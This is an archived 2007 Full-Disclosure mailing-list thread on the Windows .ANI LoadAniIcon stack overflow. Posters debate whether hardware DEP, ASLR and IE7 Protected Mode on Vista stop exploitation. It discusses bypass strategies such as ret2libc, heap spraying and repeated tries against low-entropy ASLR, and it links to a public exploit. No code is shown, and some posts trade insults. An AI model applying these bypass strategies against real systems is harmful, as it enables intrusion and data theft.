List of CPUS with NX bit (curtosy of Wikipedia)
* AMD Athlon 64
* AMD Athlon 64 X2
* AMD Athlon 64 FX
* AMD Opteron
* AMD Sempron (ab Paris)
* AMD Turion 64
* AMD Turion 64 X2
* Intel Celeron D
* Intel Celeron M (ab Dothan-Kern)
* Intel Core Duo
* Intel Core Solo
* Intel Core 2 Duo
* Intel Core 2 Extreme
* Intel Pentium 4 (ab Prescott F/J-Typ)
* Intel Pentium D
* Intel Pentium Extreme Edition
* Intel Pentium M (ab Dothan, neuere Modelle)
* Transmeta Efficeon
* VIA C7

That said, Michal Majchrowicz pointed out return-to-libc style still
works with DEP enabled, yes, but what about ASLR activated in Vista?

Anyways, George already tested it, can somebody else confirm whether
this is an issue or non-issue on Vista with NX capable CPUs?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disc

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

Larry is right here.  DEP is pretty much turned off by default for
everything except some critical system processes.  All your applications
including IE have it turned off by default.  You have to manually turn DEP
on for all programs and then make some manual exceptions for the few
applications (like Microsoft Live Meeting) that aren't compatible with DEP.
Vista isn't much better with DEP settings though I've noticed they've made
it much harder to make DEP exception entries because you now need to do it
manually instead of being prompted to insert a quick exception on the fly.


George

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Larry
Seltzer
Sent: Monday, April 02, 2007 7:53 AM
To: Thierry Zoller
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

>>That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH... 

See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed
description of the Data Execution Prevention (DEP) feature in Windows XP
Service Pack 2...")

"OptIn - This setting is the default configuration. On systems with
processors that can implement hardware-enforced DEP, DEP is enabled by
default for limited system binaries and programs that "opt-in." With
this option, only Windows system binaries are covered by DEP by default.
"

I'm almost positive that the limited system binaries do not include
Internet Explorer. At the time they made this configuration decision too
many controls were broken by turning on DEP by default. 

And the policy is the same in Vista. For now.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Morning Wood]

> Fuck you too.
> 
> Larry Seltzer
> eWEEK.com Security Center Editor

cool  Ziff-Davis lets you curse online.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Michele Cicciotti]

> Try the current milworm PoCs on NX enforced CPUS

Newsflash: none of the milw0rm PoCs ever worked on hardware DEP. We never told 
you because you seemed to have _so_ much fun tossing your cute little payloads 
around. In the happier days when I worked as an early warning dude, I used to 
keep an "IEXPLORE-NONX.EXE" with a hacked binary header (re: KJKHyperion's post 
about Torpark) that triggers the automatic disabling of DEP, to test PoCs with

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Dave Aitel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ASRL has limited entropy and the attacker can continue to try exploits
an infinite number of times (as Solar Eclipse points out). This means
you can write a reliable Vista exploit, theoretically. I'll probably
finish one up on Monday.

IE in protected mode would still allow you access to the local network
and, more importantly, anything IE does. You could, for example,
inject code into all viewed webpages that steals passwords and
whatnot. Just at the very minimum.

- -dave




Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..) 
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE. Can anyone say what actually happens if you read an e-mail in the
> Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGEAsYtehAhL0gheoRAutoAJ0QhPsOvcdCTU2dZZgkZYINC3+K3QCdFMQH
UH02qnLi2Gbp07rLWpKv/5w=
=4oC5
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Thierry Zoller]

Dear Michal,

MM> You claim is just pointless. You CAN write
MM> reliable exploit for Harware NX DEP and youCAN take over whole system
MM> even in the IE Protected mode

Oh dear, my "claim is just pointless", the fact is, I have not made
such a claim, I have introduced the notion of Hardware DEP and Software
DEP, that's what I did and that's all. Some poeple don't realise there
is a difference between them I wanted to show them there is.

In otherwords, claiming it works with "DEP enabled" just because the
PoC worked on your software-DEP-enabled machine doesn't proof it works
on HW-enabled-machines, that was my point. That's my entire point, not
saying it can't be  or is be done with Hardware DEP...get it ?

I never claimed it can't be done, actually within our company some do, so..
Try the current milworm PoCs on NX enforced CPUS

-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Thierry Zoller]

Dear Larry,

You are a stubborn guy are you? _Again_, I am not talking Software DEP
but Hardware-enforced DEP. Read: 2 different things.

This is my last email within this regard, I see no point in trying to
give you further information that might help you estimate risk, as you
seem resistant to help or pointers beyond your comprehension or
current believe.

You reference the correct page but then completely miss the point,
please read the page entirely. Your pasted information related to
software DEP not Hardware enforced DEP (which is NX bit)

Quote (wiki) :
If the x86 processor supports this feature in hardware, then the NX features
are turned on automatically in Windows XP/Server 2003 by default. If the
feature is not supported by the x86 processor, then no protection is given.

"Software DEP" is unrelated to the NX bit, and is what Microsoft calls
their enforcement of Safe Structured Exception Handling. Software DEP/SafeSEH
simply checks when an exception is thrown to make sure that the exception is
registered in a function table for the application, and requires the program
to be built with it. This is likely a countermeasure to handle an exploit
possible because of the way DEP handles NX faults; while most other
technologies simply terminate the program unquestioningly, DEP raises
an exception. It is not possible for a program to truly recover from
an attack because program flow is destroyed in an unrecoverable manner.


On the very same MS you reference page :

Hardware-enforced DEP
Hardware-enforced DEP marks all memory locations in a process as non-executable 
unless the location explicitly contains executable code.
A class of attacks exists that tries to insert and run code from non-executable 
memory locations. DEP helps prevent these attacks by
intercepting them and raising an exception.

Hardware-enforced DEP relies on processor hardware to mark memory with an 
attribute that indicates that code should not be executed
from that memory. DEP functions on a per-virtual memory page basis, and DEP 
typically changes a bit in the page table entry (PTE)
to mark the memory page.

Processor architecture determines how DEP is implemented in hardware and how 
DEP marks the virtual memory page. However,
processors that support hardware-enforced DEP can raise an exception when code 
is executed from a page that is marked with
the appropriate attribute set.

Advanced Micro Devices (AMD) and Intel have defined and shipped 
Windows-compatible architectures that are compatible with DEP.

Beginning with Windows XP SP2, the 32-bit version of Windows uses one of the 
following:
•   The no-execute page-protection (NX) processor feature as defined by AMD.
•   The Execute Disable Bit (XD) feature as defined byIntel.


List of CPUS with NX bit (curtosy of Wikipedia)
* AMD Athlon 64
* AMD Athlon 64 X2
* AMD Athlon 64 FX
* AMD Opteron
* AMD Sempron (ab Paris)
* AMD Turion 64
* AMD Turion 64 X2
* Intel Celeron D
* Intel Celeron M (ab Dothan-Kern)
* Intel Core Duo
* Intel Core Solo
* Intel Core 2 Duo
* Intel Core 2 Extreme
* Intel Pentium 4 (ab Prescott F/J-Typ)
* Intel Pentium D
* Intel Pentium Extreme Edition
* Intel Pentium M (ab Dothan, neuere Modelle)
* Transmeta Efficeon
* VIA C7

That said, Michal Majchrowicz pointed out return-to-libc style still
works with DEP enabled, yes, but what about ASLR activated in Vista?

Anyways, George already tested it, can somebody else confirm whether
this is an issue or non-issue on Vista with NX capable CPUs?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH... 

See http://support.microsoft.com/default.aspx/kb/875352 ("A detailed
description of the Data Execution Prevention (DEP) feature in Windows XP
Service Pack 2...")

"OptIn - This setting is the default configuration. On systems with
processors that can implement hardware-enforced DEP, DEP is enabled by
default for limited system binaries and programs that "opt-in." With
this option, only Windows system binaries are covered by DEP by default.
"

I'm almost positive that the limited system binaries do not include
Internet Explorer. At the time they made this configuration decision too
many controls were broken by turning on DEP by default. 

And the policy is the same in Vista. For now.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Thierry Zoller]

Dear Larry Seltzer,

I did not ask to have an explanation about Heap based exploits.

LS>I'm sure any HIPS would block it. But like DEP they're not on
LS> in Windows by default.
That's where you are wrong larry, if you have an NX capable CPU
("hardware enforced") DEP is turned on by default on all and every
process. Software DEP is not really DEP it's more like SafeSEH...


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

>>"Heap spraying" is filling the heap with controllable data... This is
simply allocating things in the heap. NOT running code.
>>You are trying to say that once you jump into that code via some
exploit (NOT part of the heap spraying technique itself) THEN you are
"running code in the heap". 

What's the point of spraying the heap if you're not going to jump into
it?
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ http://security.eweek.com/> 
http://blog.eweek.com/blogs/larry%5Fseltzer/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Jason Areff]

On 4/2/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


LS>Heap spraying implies running code in the heap,
JA>Actually, um.. no.. it doesn't

My understanding of heap spraying comes from
http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap
spraying techqniue
(http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter
.html) (the concept of this technique is that you inject the nop +
shellcode into the heap memory and use some method to trick the eip jump
into that heap ..."

Sure sounds like running code in the heap to me.




"Heap spraying" is filling the heap with controllable data... This is simply
allocating things in the heap. NOT running code.

You are trying to say that once you jump into that code via some exploit
(NOT part of the heap spraying technique itself) THEN you are "running code
in the heap".



JA>How do you get to be in that position? Lot's of buzzword-tossing I'd

have to guess.

Fuck you too.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ http://security.eweek.com/>
http://blog.eweek.com/blogs/larry%5Fseltzer/


Contributing Editor, PC Magazine
[EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

LS>Heap spraying implies running code in the heap, 
JA>Actually, um.. no.. it doesn't

My understanding of heap spraying comes from
http://blogs.securiteam.com/index.php/archives/638: "...SkyLined's heap
spraying techqniue
(http://sf-freedom.blogspot.com/2006/07/heap-spraying-internet-exploiter
.html) (the concept of this technique is that you inject the nop +
shellcode into the heap memory and use some method to trick the eip jump
into that heap ..."

Sure sounds like running code in the heap to me.
 
JA>How do you get to be in that position? Lot's of buzzword-tossing I'd
have to guess.

Fuck you too.
 
Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/ http://security.eweek.com/> 
http://blog.eweek.com/blogs/larry%5Fseltzer/

 
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Jason Areff]

On 4/2/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:


AS> A much simpler solution is to use heap spraying (which works fine on

AS> Vista) for systems that don't have DEP enabled.
TZ> Are we talking Sofware DEP or Hardware enforce DEP ?

Heap spraying implies running code in the heap,




Actually, um.. no.. it doesn't


which any DEP should

block. There are all kinds of software techniques that would detect heap
spraying. I'm sure any HIPS would block it.



Most likely not with regard to sotirov's new heap library stuff.


Larry Seltzer

eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED]




How do you get to be in that position? Lot's of buzzword-tossing I'd have to
guess.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

AS> A much simpler solution is to use heap spraying (which works fine on

AS> Vista) for systems that don't have DEP enabled.
TZ> Are we talking Sofware DEP or Hardware enforce DEP ? 

Heap spraying implies running code in the heap, which any DEP should
block. There are all kinds of software techniques that would detect heap
spraying. I'm sure any HIPS would block it. But like DEP they're not on
in Windows by default.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Thierry Zoller]

Dear Alexander Sotirov,

AS> A much simpler solution is to use heap spraying (which works fine on Vista) 
for
AS> systems that don't have DEP enabled.
Are we talking Sofware DEP or Hardware enforce DEP ?


-- 
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Alexander Sotirov]

Larry Seltzer wrote:
> Perhaps your exploit proves this wrong, but it's the last I heard on the
> subject. And even if there are only 256 slots how do you try more than
> one? Isn't the first wrong one going to crash the browser?

Read our advisory:
http://www.determina.com/security.research/vulnerabilities/ani-header.html

It explains that the vulnerable code is wrapped in an exception handler that
recovers from access violations. That means that you can trigger the exploit
multiple times and try different addresses, increasing the chance of hitting the
right one (you only need 128 tries on average)

A much simpler solution is to use heap spraying (which works fine on Vista) for
systems that don't have DEP enabled.

> As for the exploits in protected mode I'm sure there are things you can
> do, but it's a huge step down from what you can do in XP and it's gone
> as soon as you exit IE7

Unless somebody has a Vista exploit for the CSRSS kernel bug :-) In general I
agree that protected mode presents additional constraints on exploitation, but I
would reserve judgment until we've seen a few more exploits and more public
research.

Alex

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow -> Its ok, its in IE Protected Mode

[Haroon Meer]

Hi Larry..

Larry Seltzer wrote:
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE.

Assuming a compromised IE session is relatively harmless is pretty
dangerous.While low privileged browsing is a welcome idea it is
unfortunately (mostly) a solution to yesterdays problem.

In the past we used to worry about zillions of machines being
compromised and becoming zombies.
Today, we are realizing more and more that its all about the data.

ex:
I run as mh on my machine. Everything of value on my machine is
accessible to me. My music, my videos, my documents, my email, etc.
Getting root/system on my machine gets you bragging rights, but if you
were serious about hurting me, then mh is the only account you really
need to compromise.

By default, IE uses a NoWriteUp policy. Meaning that a low IL mh shell
still gets to read everything of mh's by default (Check out Mark
Minasi's chml to convert this to a more secure NoReadUp :
http://www.minasi.com/vista/chml.htm)

A low integrity shell (as a result of an IE compromise) may not be able
to write files to most locations on my machine, and so prevents my
machine from being "owned" in the traditional sense, but wont stop me
from losing all of my data.

/mh

-- 
Haroon Meer, SensePost Information Security
PGP: http://www.sensepost.com/pgp/haroon.txt
Tel: +27 83786 6637



 ** CRM114 Whitelisted by: From [EMAIL PROTECTED] **

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[James Matthews]

Windows security has allways been pockmarked

On 4/1/07, George Ou <[EMAIL PROTECTED]> wrote:


"[EMAIL PROTECTED] said:
http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and
the
default DEP settings doesn't catch it."


Default DEP settings in Windows XP or Vista are worthless since it's off
for
all applications including IE7.  I tested with DEP always-on and it
crashed
IE7 and the exploit failed.

Note that when you manually launch an HTML from your hard drive, Protected
Mode is turned off because your HDD is considered a trusted source where
as
the public Internet is not.  If I had try to browse a webpage with this
exploit, protected mode would have been turned on.  I also had to manually
bypass the Active X warning to get the exploit to run and even then it
crashed with my fully-on DEP settings with hardware-enforcement.

I don't really feel like turning off my DEP settings on my Vista machine
though I have a feeling that UAC would prevent it from rooting my system
though it could probably damage my files if it were coded to do that.  But
I
had to go out of my way to get this exploit to run by manually downloading
the zip and manually enabling the ActiveX control just to get it to crash
my
browser.

So I think it's fair to say that hardware-enforced fully-enabled DEP will
defeat the ANI exploit (in the current generic state) all by itself.
Protected Mode would have also mitigated the ANI exploit to a low-risk
state
that is non-persistent as soon as IE is closed.

So with protected mode turned off, DEP not fully enabled (or missing NX
hardware), the ANI exploit would be able to compromise the local user
profile and data but it would still need to get around UAC if it wants to
put a backdoor in Vista.



George

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





--
http://www.goldwatches.com/watches.asp?Brand=39
http://www.wazoozle.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[George Ou]

"[EMAIL PROTECTED] said:
http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and the
default DEP settings doesn't catch it."


Default DEP settings in Windows XP or Vista are worthless since it's off for
all applications including IE7.  I tested with DEP always-on and it crashed
IE7 and the exploit failed.

Note that when you manually launch an HTML from your hard drive, Protected
Mode is turned off because your HDD is considered a trusted source where as
the public Internet is not.  If I had try to browse a webpage with this
exploit, protected mode would have been turned on.  I also had to manually
bypass the Active X warning to get the exploit to run and even then it
crashed with my fully-on DEP settings with hardware-enforcement.

I don't really feel like turning off my DEP settings on my Vista machine
though I have a feeling that UAC would prevent it from rooting my system
though it could probably damage my files if it were coded to do that.  But I
had to go out of my way to get this exploit to run by manually downloading
the zip and manually enabling the ActiveX control just to get it to crash my
browser.

So I think it's fair to say that hardware-enforced fully-enabled DEP will
defeat the ANI exploit (in the current generic state) all by itself.
Protected Mode would have also mitigated the ANI exploit to a low-risk state
that is non-persistent as soon as IE is closed.

So with protected mode turned off, DEP not fully enabled (or missing NX
hardware), the ANI exploit would be able to compromise the local user
profile and data but it would still need to get around UAC if it wants to
put a backdoor in Vista.



George

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[[EMAIL PROTECTED]]

http://www.milw0rm.com/exploits/3634

str0ke told me to test this one and no miracle, it works under vista and 
the default DEP settings doesnt catch it.


[EMAIL PROTECTED] wrote:
>  From the published poc yes vista is vulnerable , the poc doesn't 
> exploit it but shows enough..
> The whole windows browser crashes when you try to open the folder of the 
> malicious .ani file,
> can't even attach it to an email because thunderbird crashes when I'm 
> browsing to attach the .ani,
> EIP is overwritten by some wrong datas near the shellcode, . To resume 
> you don't have to open the file
> on vista, displaying it is enough, there is less user interaction 
> required to exploit that bug on vista than older windows os,
>
> surprising...   ...or not =)
>  
> Larry Seltzer wrote:
>   
 It is completely possible to execute shellcode if we can do some DEP
   
 
>> bypass (ie. ret2libc attack, etc..)  
>>
>> In Vista this should have problems because of ASLR, right?
>>
>> I'm beginning to think that web-based attacks with this in Vista aren't
>> really so scary. Even if you can get them to execute what can you really
>> do in IE protected mode? You need to get the user to run the ANI outside
>> of IE. Can anyone say what actually happens if you read an e-mail in the
>> Vista Mail program with an attack ANI embedded?
>>
>> Larry Seltzer
>> eWEEK.com Security Center Editor
>> http://security.eweek.com/
>> http://blog.eweek.com/blogs/larry%5Fseltzer/
>> Contributing Editor, PC Magazine
>> [EMAIL PROTECTED] 
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> .
>>
>>   
>> 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> .
>
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[[EMAIL PROTECTED]]

 From the published poc yes vista is vulnerable , the poc doesn't 
exploit it but shows enough..
The whole windows browser crashes when you try to open the folder of the 
malicious .ani file,
can't even attach it to an email because thunderbird crashes when I'm 
browsing to attach the .ani,
EIP is overwritten by some wrong datas near the shellcode, . To resume 
you don't have to open the file
on vista, displaying it is enough, there is less user interaction 
required to exploit that bug on vista than older windows os,

surprising...   ...or not =)
 
Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
>>>   
> bypass (ie. ret2libc attack, etc..)  
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista aren't
> really so scary. Even if you can get them to execute what can you really
> do in IE protected mode? You need to get the user to run the ANI outside
> of IE. Can anyone say what actually happens if you read an e-mail in the
> Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED] 
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> .
>
>   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[Larry Seltzer]

I'm not familiar with Solar Eclipe's claims. I thought the low-entropy
argument was impeached a while ago. See
http://blogs.msdn.com/michael_howard/archive/2006/10/04/Alleged-Bugs-in-
Windows-Vista_1920_s-ASLR-Implementation.aspx The author of the original
paper arguing low entropy replies to the blog conceding the point. There
are two stages of randomization.

Perhaps your exploit proves this wrong, but it's the last I heard on the
subject. And even if there are only 256 slots how do you try more than
one? Isn't the first wrong one going to crash the browser?

As for the exploits in protected mode I'm sure there are things you can
do, but it's a huge step down from what you can do in XP and it's gone
as soon as you exit IE7

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
[EMAIL PROTECTED] 

-Original Message-
From: Dave Aitel [mailto:[EMAIL PROTECTED] 
Sent: Sunday, April 01, 2007 3:42 PM
To: Larry Seltzer
Cc: dev code; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

ASRL has limited entropy and the attacker can continue to try exploits
an infinite number of times (as Solar Eclipse points out). This means
you can write a reliable Vista exploit, theoretically. I'll probably
finish one up on Monday.

IE in protected mode would still allow you access to the local network
and, more importantly, anything IE does. You could, for example, inject
code into all viewed webpages that steals passwords and whatnot. Just at
the very minimum.

- -dave




Larry Seltzer wrote:
>>> It is completely possible to execute shellcode if we can do some DEP
> bypass (ie. ret2libc attack, etc..)
>
> In Vista this should have problems because of ASLR, right?
>
> I'm beginning to think that web-based attacks with this in Vista 
> aren't really so scary. Even if you can get them to execute what can 
> you really do in IE protected mode? You need to get the user to run 
> the ANI outside of IE. Can anyone say what actually happens if you 
> read an e-mail in the Vista Mail program with an attack ANI embedded?
>
> Larry Seltzer
> eWEEK.com Security Center Editor
> http://security.eweek.com/
> http://blog.eweek.com/blogs/larry%5Fseltzer/
> Contributing Editor, PC Magazine
> [EMAIL PROTECTED]
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFGEAsYtehAhL0gheoRAutoAJ0QhPsOvcdCTU2dZZgkZYINC3+K3QCdFMQH
UH02qnLi2Gbp07rLWpKv/5w=
=4oC5
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow

[dev code]

Just wanted to post that using a ret2libc attack works as shown in the video 
here:

http://www.zippyvideos.com/5991194746836606/ani-xp-sp2/


>From: "Chris Lyon" <[EMAIL PROTECTED]>
>To: full-disclosure@lists.grok.org.uk
>Subject: Re: [Full-disclosure] Windows .ANI LoadAniIcon Stack Overflow
>Date: Sun, 1 Apr 2007 09:24:51 -0700
>
>On 4/1/07, wac <[EMAIL PROTECTED]> wrote:
>>
>>
>>
>>On 4/1/07, Larry Seltzer <[EMAIL PROTECTED]> wrote:
>> >
>> > >>The issue is that this only works with DEP turned off!
>> >
>> > Interesting point. I haven't seen this mentioned anywhere, including 
>>the
>> > Microsoft advisory
>> > ( http://www.microsoft.com/technet/security/advisory/935423.mspx).
>> >
>> > Has anyone actually tested this with DEP on/off to be sure?
>>
>>
>Did you guys see this from the CISRT.
>
>http://www.cisrt.org/enblog/read.php?68
>
>
>Yes, winhex uses the function when you open the .ani and I don't have it
>>running with DEP turned on and the same goes for firefox that also leaves
>>the file openend when I openen  web link dev sent me (already tested 
>>winhex
>>with the address of exitprocess that btw seems to float around from system
>>to system since the version dev sent me does not works for me and it works
>>like a charm when I built it). I was talking with dev code about DEP
>>bypassing btw, we think that is possible to exploit even with >> DEP ON 
>><<.
>>Just ideas for now.
>>
>>Larry Seltzer
>> > eWEEK.com Security Center Editor
>> > http://security.eweek.com/
>> > http://blog.eweek.com/blogs/larry_seltzer/
>> > Contributing Editor, PC Magazine
>> > [EMAIL PROTECTED]
>> >
>> > ___
>> > Full-Disclosure - We believe in it.
>> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> > Hosted and sponsored by Secunia - http://secunia.com/
>> >
>>
>>
>>___
>>Full-Disclosure - We believe in it.
>>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>Hosted and sponsored by Secunia - http://secunia.com/
>>


>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/

_
The average US Credit Score is 675. The cost to see yours: $0 by Experian. 
http://www.freecreditreport.com/pm/default.aspx?sc=660600&bcd=EMAILFOOTERAVERAGE

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

